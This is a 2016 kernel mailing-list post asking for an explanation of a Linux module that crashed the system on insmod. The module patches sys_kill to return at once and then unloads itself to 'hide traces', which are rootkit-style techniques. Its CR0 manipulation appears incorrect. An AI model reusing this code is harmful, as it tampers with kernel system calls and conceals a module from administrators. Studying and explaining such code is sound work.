Kernel panic after insmod
Manavendra Nath Manav
mnm.kernel at gmail.com
Sun Jun 26 05:35:55 EDT 2016
Can someone explain the following kernel module code? I'm not familiar with
x86 assembly, so I have a problem understanding this part. Also, it seems this
code is able to modify the kernel stack.
/******************start****************/
#include <linux/module.h>

MODULE_LICENSE("GPL");

int __init init(void) __attribute__((noreturn))
{
    unsigned long long cr0 = read_cr0();

    write_cr0(cr0 & ~(1 << 4)); /* Clear Extension Type (ET) bit */
    *(unsigned char *)sys_kill = 0xc3; /* opcode for "ret" */
    write_cr0(cr0);

    /* Optional code ahead to hide traces of this module. */
    __this_module.refcnt = 1;
    __this_module.state = MODULE_STATE_LIVE;

    asm
    (
        "mov %0, %%rsp\n\t"
        "mov %1, %%rdi\n\t"        /* name = __this_module.name */
        "xor %%rsi, %%rsi\n\t"     /* flags = 0 */
        "jmp sys_delete_module\n\t" /* call delete_module(name, flags) */
        :: "r"(current->stack + THREAD_SIZE - sizeof(struct pt_regs) - 8), "r"(__this_module.name) :
    );
}

void __exit exit(void)
{
    return;
}
/*******************end*****************/